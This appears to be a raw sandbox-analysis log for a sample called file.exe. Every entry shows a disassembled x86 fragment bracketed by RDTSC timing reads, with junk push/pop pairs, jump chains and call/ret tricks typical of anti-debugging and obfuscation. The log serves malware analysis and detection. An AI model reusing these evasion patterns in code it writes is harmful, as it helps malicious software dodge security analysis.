                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8597D second address: C85A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or di, 631Fh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F99607DC0C8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D2DD9h], edx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov di, cx 0x0000003d push ebx 0x0000003e mov di, 2B00h 0x00000042 pop edi 0x00000043 mov eax, dword ptr [ebp+122D0211h] 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007F99607DC0C8h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D2AABh] 0x00000069 ja 00007F99607DC0C9h 0x0000006f push FFFFFFFFh 0x00000071 jl 00007F99607DC0CFh 0x00000077 pushad 0x00000078 cld 0x00000079 xor dword ptr [ebp+122D2491h], ebx 0x0000007f popad 0x00000080 nop 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F99607DC0D7h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85A28 second address: C85A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8AB40 second address: C8AB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8878E second address: C887B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F996107E1C4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C887B1 second address: C887B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C887B7 second address: C887C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F996107E1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8ACC2 second address: C8ACD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0CFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAB2 second address: C8CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAB6 second address: C8CABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8BC70 second address: C8BC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CBDA second address: C8CBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EB2C second address: C8EB83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D3702h], esi 0x00000010 push 00000000h 0x00000012 mov bx, 73DAh 0x00000016 push 00000000h 0x00000018 jmp 00007F996107E1C3h 0x0000001d call 00007F996107E1BCh 0x00000022 jg 00007F996107E1B6h 0x00000028 pop ebx 0x00000029 push eax 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EB83 second address: C8EB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91BA6 second address: C91BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F996107E1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91BB0 second address: C91BBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F99607DC0C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94260 second address: C94264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94264 second address: C94268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DD04 second address: C8DD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DD08 second address: C8DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FD1A second address: C8FD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C922A5 second address: C922A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C922A9 second address: C922AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9540B second address: C95411 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95411 second address: C95481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F996107E1B8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movzx ebx, cx 0x00000027 push 00000000h 0x00000029 mov ebx, 688D9EC1h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F996107E1B8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov di, ax 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F996107E1BAh 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C955C3 second address: C955D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C955D7 second address: C955DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C966BF second address: C966C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C96779 second address: C96783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F996107E1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D783 second address: C9D787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D787 second address: C9D791 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F996107E1B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D791 second address: C9D7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F99607DC0CFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA33E1 second address: CA33F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F996107E1BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA34F0 second address: CA34F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA34F4 second address: CA353C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F996107E1BCh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F996107E1C2h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push esi 0x0000001c jne 00007F996107E1BCh 0x00000022 pop esi 0x00000023 mov eax, dword ptr [eax] 0x00000025 ja 00007F996107E1C4h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA353C second address: CA3540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3540 second address: CA3553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jnc 00007F996107E1BEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9342 second address: CA9346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9346 second address: CA934C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8847 second address: CA8864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F99607DC0D0h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA89D0 second address: CA89D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA89D9 second address: CA89DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B4F8 second address: C3B4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B4FC second address: C3B50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B50D second address: C3B529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F996107E1C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAECD7 second address: CAECDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAEE49 second address: CAEE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAEE4F second address: CAEE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE4E2 second address: CAE4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F996107E1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE4EC second address: CAE4F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF26D second address: CAF271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAEAC second address: CBAECD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99607DC0CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99607DC0CEh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAECD second address: CBAED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAED1 second address: CBAED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAED7 second address: CBAEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAEEB second address: CBAF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9B18 second address: CB9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9C5B second address: CB9C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F99607DC0C6h 0x0000000d jl 00007F99607DC0C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9C6E second address: CB9C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9DBA second address: CB9DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F99607DC0C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9DC6 second address: CB9DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA176 second address: CBA180 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA664 second address: CBA668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C370 second address: C2C390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0CFh 0x00000009 jmp 00007F99607DC0CBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB97F3 second address: CB97F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB97F9 second address: CB97FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB97FD second address: CB9801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9801 second address: CB9809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9809 second address: CB9838 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007F996107E1B6h 0x00000009 jnp 00007F996107E1B6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F996107E1BAh 0x00000018 push edi 0x00000019 jmp 00007F996107E1BCh 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB9838 second address: CB983C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2B4A second address: CC2B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1AB2 second address: CC1AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1AB8 second address: CC1AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F996107E1C4h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007F996107E1B6h 0x00000014 popad 0x00000015 jnl 00007F996107E1C2h 0x0000001b popad 0x0000001c push esi 0x0000001d pushad 0x0000001e jmp 00007F996107E1BBh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1AFD second address: CC1B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D1h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7A3D6 second address: C7A3F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F996107E1C3h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7A5C5 second address: C7A5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F99607DC0C6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AA6A second address: C7AAA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C0h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007F996107E1C9h 0x00000014 jmp 00007F996107E1C3h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AAA5 second address: C7AAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AAAA second address: C7AACF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F996107E1BEh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c sub dword ptr [ebp+122D17F6h], ecx 0x00000012 push 0AA09E41h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AACF second address: C7AAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ABEC second address: C7ABF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AD56 second address: C7AD5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AFBD second address: C7AFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AFC3 second address: C7AFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AFC7 second address: C7B002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jo 00007F996107E1BCh 0x00000011 mov dword ptr [ebp+122D2E23h], eax 0x00000017 push 00000004h 0x00000019 adc dx, 093Ch 0x0000001e nop 0x0000001f push ebx 0x00000020 pushad 0x00000021 jmp 00007F996107E1C8h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B002 second address: C7B01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99607DC0D1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B01C second address: C7B021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B021 second address: C7B027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B411 second address: C7B415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B415 second address: C7B419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC25A7 second address: CC25AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC25AB second address: CC25B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC25B1 second address: CC25BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC25BB second address: CC25BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC25BF second address: CC25CD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC25CD second address: CC25D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2709 second address: CC270F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC270F second address: CC2713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2713 second address: CC272B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BEh 0x00000007 jnl 00007F996107E1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC272B second address: CC274A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F99607DC0D9h 0x0000000b rdtsc
